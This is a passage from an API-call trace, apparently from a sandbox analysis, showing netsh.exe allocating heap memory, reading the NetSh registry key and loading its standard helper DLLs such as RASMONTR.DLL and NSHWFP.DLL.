(HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173a60 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173a80 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173aa0 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173ac0 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173ae0 [0124.673] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173b00 [0124.674] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173b20 [0124.674] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173b40 [0124.674] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173b60 [0124.674] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173b80 [0124.674] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173ba0 [0124.674] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173bc0 [0124.674] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173be0 [0124.674] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173c00 [0124.674] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173c20 [0124.674] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173c40 [0124.674] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173c60 [0124.674] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173c80 [0124.674] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173ca0 [0124.674] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173cc0 [0124.674] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173ce0 [0124.674] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173d00 [0124.674] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173d20 [0124.674] GetProcessHeap () returned 0x150000 [0124.674] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173d40 [0124.674] GetProcessHeap () returned 0x150000 [0124.675] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173d60 [0124.675] GetProcessHeap () returned 0x150000 [0124.675] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173d80 [0124.675] GetProcessHeap () returned 0x150000 [0124.675] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173da0 [0124.675] GetProcessHeap () returned 0x150000 [0124.675] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173dc0 [0124.675] GetProcessHeap () returned 0x150000 [0124.675] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173de0 [0124.675] GetProcessHeap () returned 0x150000 [0124.675] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173e00 [0124.675] GetProcessHeap () returned 0x150000 [0124.675] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173e20 [0124.675] GetProcessHeap () returned 0x150000 [0124.675] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173e40 [0124.675] GetProcessHeap () returned 0x150000 [0124.675] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173e60 [0124.675] GetProcessHeap () returned 0x150000 [0124.675] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173e80 [0124.675] GetProcessHeap () returned 0x150000 [0124.675] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173ea0 [0124.675] GetProcessHeap () returned 0x150000 [0124.675] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173ec0 [0124.676] GetProcessHeap () returned 0x150000 [0124.676] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173ee0 [0124.676] GetProcessHeap () returned 0x150000 [0124.676] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173f00 [0124.676] GetProcessHeap () returned 0x150000 [0124.676] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173f20 [0124.676] GetProcessHeap () returned 0x150000 [0124.676] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173f40 [0124.676] GetProcessHeap () returned 0x150000 [0124.676] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173f60 [0124.676] GetProcessHeap () returned 0x150000 [0124.676] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173f80 [0124.676] GetProcessHeap () returned 0x150000 [0124.676] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173fe0 [0124.676] GetProcessHeap () returned 0x150000 [0124.676] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x174000 [0124.676] GetProcessHeap () returned 0x150000 [0124.676] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x174020 [0124.676] GetProcessHeap () returned 0x150000 [0124.676] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x174040 [0124.676] GetProcessHeap () returned 0x150000 [0124.676] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x174060 [0124.676] GetProcessHeap () returned 0x150000 [0124.676] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x174080 [0124.676] GetProcessHeap () returned 0x150000 [0124.676] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1740a0 [0124.676] GetProcessHeap () returned 0x150000 [0124.676] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1740c0 [0124.676] GetProcessHeap () returned 0x150000 [0124.676] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1740e0 [0124.676] GetProcessHeap () returned 0x150000 [0124.676] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x174100 [0124.677] GetProcessHeap () returned 0x150000 [0124.677] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x174120 [0124.677] GetProcessHeap () returned 0x150000 [0124.677] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x174140 [0124.677] GetProcessHeap () returned 0x150000 [0124.677] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x174160 [0124.677] GetProcessHeap () returned 0x150000 [0124.677] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x174180 [0124.677] GetProcessHeap () returned 0x150000 [0124.677] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1741a0 [0124.677] GetProcessHeap () returned 0x150000 [0124.677] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1741c0 [0124.677] GetProcessHeap () returned 0x150000 [0124.677] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1741e0 [0124.677] GetProcessHeap () returned 0x150000 [0124.677] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x174200 [0124.677] GetProcessHeap () returned 0x150000 [0124.677] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x174220 [0124.677] _wcsicmp (_String1="netsh.exe", _String2="ipxmontr.dll") returned 5 [0124.677] _wcsicmp (_String1="netsh.exe", _String2="ipxpromn.dll") returned 5 [0124.677] GetProcessHeap () returned 0x150000 [0124.677] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x28) returned 0x16e040 [0124.677] GetProcessHeap () returned 0x150000 [0124.677] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x2) returned 0x1747b0 [0124.677] GetProcessHeap () returned 0x150000 [0124.677] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x14) returned 0x174240 [0124.677] _wcsupr (in: _String="netsh.exe" | out: _String="NETSH.EXE") returned="NETSH.EXE" [0124.677] GetProcessHeap () returned 0x150000 [0124.677] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x150000) returned 1 [0124.677] GetProcessHeap () returned 0x150000 [0124.678] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x58) returned 0x1747d0 [0124.678] GetProcessHeap () returned 0x150000 [0124.678] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x150000) returned 1 [0124.678] GetProcessHeap () returned 0x150000 [0124.678] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xb0) returned 0x16eb10 [0124.678] GetProcessHeap () returned 0x150000 [0124.678] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1747d0 | out: hHeap=0x150000) returned 1 [0124.678] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\NetSh", ulOptions=0x0, samDesired=0x20019, phkResult=0x147728 | out: phkResult=0x147728*=0x90) returned 0x0 [0124.678] RegQueryInfoKeyW (in: hKey=0x90, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x147750, lpcbMaxValueNameLen=0x147760, lpcbMaxValueLen=0x147758, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x147750*=0x15, lpcbMaxValueNameLen=0x147760, lpcbMaxValueLen=0x147758, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.678] GetProcessHeap () returned 0x150000 [0124.678] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x8, Size=0x16) returned 0x174260 [0124.678] GetProcessHeap () returned 0x150000 [0124.678] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x8, Size=0x23) returned 0x16e070 [0124.678] RegEnumValueW (in: hKey=0x90, dwIndex=0x0, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="4", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0124.678] _wcsicmp (_String1="rasmontr.dll", _String2="ipxmontr.dll") returned 9 [0124.678] _wcsicmp (_String1="rasmontr.dll", _String2="ipxpromn.dll") returned 9 [0124.678] GetProcessHeap () returned 0x150000 [0124.678] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x50) returned 0x1747d0 [0124.678] GetProcessHeap () returned 0x150000 [0124.678] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x4) returned 0x174830 [0124.679] GetProcessHeap () returned 0x150000 [0124.679] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1a) returned 0x16e0a0 [0124.679] _wcsupr (in: _String="rasmontr.dll" | out: _String="RASMONTR.DLL") returned="RASMONTR.DLL" [0124.679] GetProcessHeap () returned 0x150000 [0124.679] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x16e040 | out: hHeap=0x150000) returned 1 [0124.679] LoadLibraryW (lpLibFileName="RASMONTR.DLL") returned 0x7fef4310000 [0124.928] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x147120 | out: lpSystemTimeAsFileTime=0x147120*(dwLowDateTime=0x5179d670, dwHighDateTime=0x1d4f12b)) [0124.928] GetCurrentProcessId () returned 0x32c [0124.928] GetCurrentThreadId () returned 0x5f0 [0124.928] GetTickCount () returned 0xae67 [0124.928] RtlQueryPerformanceCounter (in: lpPerformanceCount=0x147128 | out: lpPerformanceCount=0x147128*=8925439010) returned 1 [0124.930] LoadLibraryA (lpLibFileName="MSVCRT.DLL") returned 0x7fefee20000 [0124.931] GetVersion () returned 0x1db10106 [0124.931] SetErrorMode (uMode=0x0) returned 0x0 [0124.931] SetErrorMode (uMode=0x8001) returned 0x0 [0124.932] LocalAlloc (uFlags=0x0, uBytes=0x2000) returned 0x1761c0 [0124.932] LocalFree (hMem=0x1761c0) returned 0x0 [0124.932] GetVersion () returned 0x1db10106 [0124.933] GlobalLock (hMem=0x9c0008) returned 0x1761c0 [0124.934] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x1763e0 [0124.934] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x174ee0 [0124.934] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x174280 [0124.934] malloc (_Size=0x100) returned 0x307c50 [0124.934] __dllonexit () returned 0x7fef409621c [0124.934] __dllonexit () returned 0x7fef40966e0 [0124.935] __dllonexit () returned 0x7fef40972b8 [0124.935] __dllonexit () returned 0x7fef40987cc [0124.935] __dllonexit () returned 0x7fef4098d64 [0124.935] __dllonexit () returned 0x7fef4098db4 [0124.935] __dllonexit () returned 0x7fef4098e70 [0124.935] __dllonexit () returned 0x7fef409a308 [0124.935] __dllonexit () returned 0x7fef4098810 [0124.936] __dllonexit () returned 0x7fef40a7598 [0124.936] __dllonexit () returned 0x7fef4098880 [0124.936] __dllonexit () returned 0x7fef409a170 [0124.936] __dllonexit () returned 0x7fef409a280 [0124.936] __dllonexit () returned 0x7fef409ad44 [0124.936] __dllonexit () returned 0x7fef409bc30 [0124.936] __dllonexit () returned 0x7fef409bc80 [0124.936] __dllonexit () returned 0x7fef409c338 [0124.936] __dllonexit () returned 0x7fef409d030 [0124.936] __dllonexit () returned 0x7fef40959cc [0124.937] __dllonexit () returned 0x7fef40959f0 [0124.937] __dllonexit () returned 0x7fef4095a1c [0124.938] RegisterClipboardFormatW (lpszFormat="commctrl_DragListMsg") returned 0xc0fd [0124.938] __dllonexit () returned 0x7fef40a7568 [0124.939] __dllonexit () returned 0x7fef40a7574 [0124.939] __dllonexit () returned 0x7fef40a7580 [0124.939] __dllonexit () returned 0x7fef40a758c [0124.939] GetVersion () returned 0x1db10106 [0124.939] GetVersion () returned 0x1db10106 [0124.939] GetVersion () returned 0x1db10106 [0124.939] __dllonexit () returned 0x7fef3ffa15c [0124.939] __dllonexit () returned 0x7fef4006610 [0124.939] __dllonexit () returned 0x7fef4098910 [0124.939] __dllonexit () returned 0x7fef4098b90 [0124.939] __dllonexit () returned 0x7fef4098bb4 [0124.939] __dllonexit () returned 0x7fef4016ae0 [0124.940] GetVersion () returned 0x1db10106 [0124.940] GetProcessVersion (ProcessId=0x0) returned 0x60001 [0124.940] GetSystemMetrics (nIndex=11) returned 32 [0124.940] GetSystemMetrics (nIndex=12) returned 32 [0124.940] GetSystemMetrics (nIndex=2) returned 17 [0124.940] GetSystemMetrics (nIndex=3) returned 17 [0124.941] GetDC (hWnd=0x0) returned 0x100101fa [0124.941] GetDeviceCaps (hdc=0x100101fa, index=88) returned 96 [0124.941] GetDeviceCaps (hdc=0x100101fa, index=90) returned 96 [0124.941] ReleaseDC (hWnd=0x0, hDC=0x100101fa) returned 1 [0124.941] GetSysColor (nIndex=15) returned 0xf0f0f0 [0124.941] GetSysColor (nIndex=16) returned 0xa0a0a0 [0124.941] GetSysColor (nIndex=20) returned 0xffffff [0124.941] GetSysColor (nIndex=18) returned 0x0 [0124.941] GetSysColor (nIndex=6) returned 0x646464 [0124.941] GetSysColorBrush (nIndex=15) returned 0x1100059 [0124.941] GetSysColorBrush (nIndex=6) returned 0x1100061 [0124.941] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0124.941] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0124.941] __dllonexit () returned 0x7fef4098f84 [0124.941] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fe [0124.942] __dllonexit () returned 0x7fef4023990 [0124.942] RegisterClipboardFormatW (lpszFormat="Native") returned 0xc004 [0124.942] RegisterClipboardFormatW (lpszFormat="OwnerLink") returned 0xc003 [0124.942] RegisterClipboardFormatW (lpszFormat="ObjectLink") returned 0xc002 [0124.942] RegisterClipboardFormatW (lpszFormat="Embedded Object") returned 0xc00a [0124.942] RegisterClipboardFormatW (lpszFormat="Embed Source") returned 0xc00b [0124.942] RegisterClipboardFormatW (lpszFormat="Link Source") returned 0xc00d [0124.943] RegisterClipboardFormatW (lpszFormat="Object Descriptor") returned 0xc00e [0124.943] RegisterClipboardFormatW (lpszFormat="Link Source Descriptor") returned 0xc00f [0124.943] RegisterClipboardFormatW (lpszFormat="FileName") returned 0xc006 [0124.943] RegisterClipboardFormatW (lpszFormat="FileNameW") returned 0xc007 [0124.943] RegisterClipboardFormatW (lpszFormat="Rich Text Format") returned 0xc0b1 [0124.943] RegisterClipboardFormatW (lpszFormat="RichEdit Text and Objects") returned 0xc0b7 [0124.943] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fe [0124.943] __dllonexit () returned 0x7fef40a75a4 [0124.943] __dllonexit () returned 0x7fef40a75bc [0124.943] __dllonexit () returned 0x7fef40a75c8 [0124.943] __dllonexit () returned 0x7fef40a75d4 [0124.944] __dllonexit () returned 0x7fef40a75e0 [0124.944] GetCursorPos (in: lpPoint=0x7fef41026d8 | out: lpPoint=0x7fef41026d8*(x=806, y=457)) returned 1 [0124.944] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x176730 [0124.944] LocalReAlloc (hMem=0x174280, uBytes=0x18, uFlags=0x2) returned 0x176840 [0124.944] GetCurrentThread () returned 0xfffffffffffffffe [0124.944] GetCurrentThreadId () returned 0x5f0 [0124.944] __dllonexit () returned 0x7fef409cfa4 [0124.945] SetErrorMode (uMode=0x0) returned 0x8001 [0124.945] SetErrorMode (uMode=0x8001) returned 0x0 [0124.945] GetModuleFileNameW (in: hModule=0x7fef3fe0000, lpFilename=0x146810, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MFC42u.dll" (normalized: "c:\\windows\\system32\\mfc42u.dll")) returned 0x1e [0124.945] wcscpy_s (in: _Destination=0x146a20, _SizeInWords=0x104, _Source="MFC42u" | out: _Destination="MFC42u") returned 0x0 [0124.946] FindResourceW (hModule=0x7fef3fe0000, lpName=0xe01, lpType=0x6) returned 0x7f09b0 [0124.963] LoadStringW (in: hInstance=0x7fef3fe0000, uID=0xe000, lpBuffer=0x146c30, cchBufferMax=256 | out: lpBuffer="") returned 0x0 [0124.963] wcscpy_s (in: _Destination=0x146844, _SizeInWords=0x5, _Source=".HLP" | out: _Destination=".HLP") returned 0x0 [0124.963] wcscat_s (in: _Destination="MFC42u", _SizeInWords=0x104, _Source=".INI" | out: _Destination="MFC42u.INI") returned 0x0 [0124.970] malloc (_Size=0x80) returned 0x307e80 [0124.970] LocalAlloc (uFlags=0x40, uBytes=0x2100) returned 0x176860 [0124.970] GetSystemDirectoryA (in: lpBuffer=0x146eb0, uSize=0x112 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0124.970] strcat_s (in: _Destination="C:\\Windows\\system32", _SizeInBytes=0x112, _Source="\\MFC42" | out: _Destination="C:\\Windows\\system32\\MFC42") returned 0x0 [0124.970] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42", _SizeInBytes=0x112, _Source="LOC" | out: _Destination="C:\\Windows\\system32\\MFC42LOC") returned 0x0 [0124.970] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42LOC", _SizeInBytes=0x112, _Source=".DLL" | out: _Destination="C:\\Windows\\system32\\MFC42LOC.DLL") returned 0x0 [0124.970] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\MFC42LOC.DLL", hFile=0x0, dwFlags=0x2) returned 0x0 [0124.975] GetProcAddress (hModule=0x7fef4310000, lpProcName="InitHelperDll") returned 0x7fef432cf70 [0124.975] InitHelperDll () returned 0x0 [0124.975] RegisterHelper () returned 0x0 [0124.975] GetProcessHeap () returned 0x150000 [0124.975] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x108) returned 0x178970 [0124.976] GetProcessHeap () returned 0x150000 [0124.976] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x16eb10 | out: hHeap=0x150000) returned 1 [0124.979] RegisterHelper () returned 0x0 [0124.979] GetProcessHeap () returned 0x150000 [0124.979] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x160) returned 0x178a80 [0124.979] GetProcessHeap () returned 0x150000 [0124.979] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x178970 | out: hHeap=0x150000) returned 1 [0124.979] RegisterHelper () returned 0x0 [0124.979] GetProcessHeap () returned 0x150000 [0124.979] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1b8) returned 0x178bf0 [0124.979] GetProcessHeap () returned 0x150000 [0124.979] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x178a80 | out: hHeap=0x150000) returned 1 [0124.979] RegisterHelper () returned 0x0 [0124.979] GetProcessHeap () returned 0x150000 [0124.979] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x210) returned 0x178970 [0124.979] GetProcessHeap () returned 0x150000 [0124.979] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x178bf0 | out: hHeap=0x150000) returned 1 [0124.979] RegisterHelper () returned 0x0 [0124.979] GetProcessHeap () returned 0x150000 [0124.980] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x268) returned 0x178b90 [0124.980] GetProcessHeap () returned 0x150000 [0124.980] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x178970 | out: hHeap=0x150000) returned 1 [0124.980] RegEnumValueW (in: hKey=0x90, dwIndex=0x1, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="nshwfp", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0124.980] _wcsicmp (_String1="nshwfp.dll", _String2="ipxmontr.dll") returned 5 [0124.980] _wcsicmp (_String1="nshwfp.dll", _String2="ipxpromn.dll") returned 5 [0124.980] GetProcessHeap () returned 0x150000 [0124.980] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x78) returned 0x178970 [0124.980] GetProcessHeap () returned 0x150000 [0124.980] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xe) returned 0x174280 [0124.980] GetProcessHeap () returned 0x150000 [0124.980] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x16) returned 0x1742a0 [0124.980] _wcsupr (in: _String="nshwfp.dll" | out: _String="NSHWFP.DLL") returned="NSHWFP.DLL" [0124.980] GetProcessHeap () returned 0x150000 [0124.980] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1747d0 | out: hHeap=0x150000) returned 1 [0124.980] LoadLibraryW (lpLibFileName="NSHWFP.DLL") returned 0x7fef3770000 [0125.050] GetProcAddress (hModule=0x7fef3770000, lpProcName="InitHelperDll") returned 0x7fef37db6d0 [0125.050] InitHelperDll () returned 0x0 [0125.053] RegisterHelper () returned 0x0 [0125.053] GetProcessHeap () returned 0x150000 [0125.053] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x2c0) returned 0x182db0 [0125.053] GetProcessHeap () returned 0x150000 [0125.053] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x178b90 | out: hHeap=0x150000) returned 1 [0125.053] RegEnumValueW (in: hKey=0x90, dwIndex=0x2, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="dhcpclient", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0125.053] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxmontr.dll") returned -5 [0125.053] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxpromn.dll") returned -5 [0125.053] GetProcessHeap () returned 0x150000 [0125.053] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xa0) returned 0x178b90 [0125.054] GetProcessHeap () returned 0x150000 [0125.054] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x16) returned 0x1742c0 [0125.054] GetProcessHeap () returned 0x150000 [0125.054] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x22) returned 0x1791c0 [0125.054] _wcsupr (in: _String="dhcpcmonitor.dll" | out: _String="DHCPCMONITOR.DLL") returned="DHCPCMONITOR.DLL" [0125.054] GetProcessHeap () returned 0x150000 [0125.054] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x178970 | out: hHeap=0x150000) returned 1 [0125.054] LoadLibraryW (lpLibFileName="DHCPCMONITOR.DLL") returned 0x7fef43b0000 [0125.633] GetProcAddress (hModule=0x7fef43b0000, lpProcName="InitHelperDll") returned 0x7fef43b1a40 [0125.633] InitHelperDll () returned 0x0 [0125.633] RegisterHelper () returned 0x0 [0125.633] GetProcessHeap () returned 0x150000 [0125.633] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x318) returned 0x187d80 [0125.634] GetProcessHeap () returned 0x150000 [0125.634] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x182db0 | out: hHeap=0x150000) returned 1 [0125.634] RegEnumValueW (in: hKey=0x90, dwIndex=0x3, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="wshelper", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0125.634] _wcsicmp (_String1="wshelper.dll", _String2="ipxmontr.dll") returned 14 [0125.634] _wcsicmp (_String1="wshelper.dll", _String2="ipxpromn.dll") returned 14 [0125.634] GetProcessHeap () returned 0x150000 [0125.634] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xc8) returned 0x182db0 [0125.634] GetProcessHeap () returned 0x150000 [0125.634] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x12) returned 0x185530 [0125.634] GetProcessHeap () returned 0x150000 [0125.634] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1a) returned 0x183500 [0125.634] _wcsupr (in: _String="wshelper.dll" | out: _String="WSHELPER.DLL") returned="WSHELPER.DLL" [0125.634] GetProcessHeap () returned 0x150000 [0125.634] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x178b90 | out: hHeap=0x150000) returned 1 [0125.634] LoadLibraryW (lpLibFileName="WSHELPER.DLL") returned 0x7fef3ef0000 [0125.938] GetProcAddress (hModule=0x7fef3ef0000, lpProcName="InitHelperDll") returned 0x7fef3ef1720 [0125.938] InitHelperDll () returned 0x0 [0125.947] RegisterHelper () returned 0x0 [0125.947] GetProcessHeap () returned 0x150000 [0125.947] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x370) returned 0x188af0 [0125.947] GetProcessHeap () returned 0x150000 [0125.947] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x187d80 | out: hHeap=0x150000) returned 1 [0125.947] RegEnumValueW (in: hKey=0x90, dwIndex=0x4, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="nshhttp", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0125.947] _wcsicmp (_String1="nshhttp.dll", _String2="ipxmontr.dll") returned 5 [0125.947] _wcsicmp (_String1="nshhttp.dll", _String2="ipxpromn.dll") returned 5 [0125.947] GetProcessHeap () returned 0x150000 [0125.948] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xf0) returned 